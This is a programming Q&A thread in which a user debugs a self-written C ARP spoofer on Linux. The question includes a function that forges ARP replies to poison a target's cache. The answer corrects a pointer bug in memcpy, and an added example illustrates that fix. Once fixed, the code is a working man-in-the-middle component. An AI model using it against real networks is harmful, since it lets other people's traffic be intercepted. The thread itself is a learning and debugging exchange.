0
votes

I am trying to make a simple ARP spoofer in C on Linux (mainly to better understand low-level networking). So far I was successful with creating an ARP request and getting ARP replies with the MAC addresses of the target and the gateway, but whenever I send out ARP replies to the target/gateway, the ARP table on my test computer is not updating; it still shows the proper gateway MAC address. It is not a network problem, because the Kali Linux arpspoof command is working properly and the ARP cache is updating.

Here is my code for sending spoofed arp packets:

void arp_spoof(int sock, LOCAL_DATA localData, uint32_t pdst, unsigned char hwdst[6], uint32_t psrc)
{
    struct ether_arp arpPacket;

    struct sockaddr_ll addr = {0};
    addr.sll_family = AF_PACKET;
    addr.sll_ifindex = localData.interface_index;
    addr.sll_halen = ETHER_ADDR_LEN;
    addr.sll_protocol = htons(ETH_P_ARP);
    memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);  // destination physical address

    // basic info about the arp packet
    arpPacket.arp_hrd = htons(ARPHRD_ETHER);
    arpPacket.arp_pro = htons(ETH_P_IP);
    arpPacket.arp_hln = ETHER_ADDR_LEN;
    arpPacket.arp_pln = sizeof(in_addr_t);
    arpPacket.arp_op = htons(ARPOP_REPLY);

    /*======== Resulting Structure ========

    Source MAC : local mac (attacker)
    Source IP  : ip of the machine attacker wants
                 destination machine to believe is the source

    Destination MAC : real destination physical address
    Destination IP  : real destination ip address

    ======================================*/

    // Source MAC [REAL]
    memcpy(&arpPacket.arp_sha, localData.mac_address, sizeof(arpPacket.arp_sha));

    // Source IP [SPOOFED / FAKE]
    memcpy(&arpPacket.arp_spa, &psrc, sizeof(arpPacket.arp_spa));

    // Destination MAC [REAL]
    memcpy(&arpPacket.arp_tha, hwdst, sizeof(arpPacket.arp_tha));

    // Destination ip [REAL]
    memcpy(&arpPacket.arp_tpa, &pdst, sizeof(arpPacket.arp_tpa));

    // sending the packet to the target
    if (sendto(sock, &arpPacket, sizeof(arpPacket), 0, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        printf("Error arp spoofing target: ");
        PrintIpAddress(pdst);
    }
}
1
It could be because the real host is also replying to the ARP request, and it is arriving last, forcing the requesting host to update its ARP table with the real MAC address. There can also be something like DHCP snooping and Dynamic ARP inspection on a switch. - Ron Maupin
@RonMaupin Hmm, does that mean that I should change the timing of when the packets are sent? Interestingly, when I execute an arpspoof command on Kali Linux, it ARP spoofs the target correctly and the spoofed MAC address is showing up in the target's ARP table. - Flare Flax

1 Answer

0
votes

I made a stupid mistake in the code.
In the line below:

    memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);

I was giving the pointer to the pointer as a parameter, &hwdst. Since hwdst is already an array from the parameter, it would just take the pointer to the first element. The correct line should be:

    memcpy(addr.sll_addr, hwdst, ETHER_ADDR_LEN);
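What the two `memcpy` calls actually copy, as an added example that is not part of the original answer: an array parameter is adjusted to a pointer, so `&hwdst` yields the bytes of the pointer variable rather than the MAC. The helper names and the sample MAC are constructed for illustration, and the last check assumes a 64-bit build where a pointer is at least six bytes wide.

```c
#include <stdio.h>
#include <string.h>

#define MAC_LEN 6 /* same value as ETHER_ADDR_LEN */

/* Constructed sample MAC (locally administered), not taken from the post. */
static unsigned char sample_mac[MAC_LEN] = {0x02, 0x00, 0x00, 0xaa, 0xbb, 0xcc};

/* As in the question: `hwdst[6]` in a parameter list is really
 * `unsigned char *hwdst`, so &hwdst is the address of that pointer
 * variable and memcpy copies bytes of the pointer value itself. */
static void copy_mac_buggy(unsigned char *dst, unsigned char hwdst[MAC_LEN])
{
    memcpy(dst, &hwdst, MAC_LEN);
}

/* As in the answer: pass the pointer, so the six MAC bytes are copied. */
static void copy_mac_fixed(unsigned char *dst, unsigned char hwdst[MAC_LEN])
{
    memcpy(dst, hwdst, MAC_LEN);
}

/* 1 if the chosen copy routine reproduces sample_mac, else 0. */
static int copy_matches_mac(void (*copy)(unsigned char *, unsigned char *))
{
    unsigned char out[MAC_LEN] = {0};
    copy(out, sample_mac);
    return memcmp(out, sample_mac, MAC_LEN) == 0;
}

/* 1 if the buggy copy produced the first six bytes of the pointer's storage. */
static int buggy_copies_pointer_bytes(void)
{
    unsigned char out[MAC_LEN] = {0};
    unsigned char *p = sample_mac;
    copy_mac_buggy(out, sample_mac);
    return memcmp(out, &p, MAC_LEN) == 0;
}

int main(void)
{
    printf("fixed copy matches MAC:        %d\n", copy_matches_mac(copy_mac_fixed));
    printf("buggy copy matches MAC:        %d\n", copy_matches_mac(copy_mac_buggy));
    printf("buggy copy is pointer's bytes: %d\n", buggy_copies_pointer_bytes());
    return 0;
}
```

The compiler accepts both calls because `memcpy` takes `const void *`, so a check of this kind or a byte dump of `sll_addr` is what exposes the wrong link-layer destination.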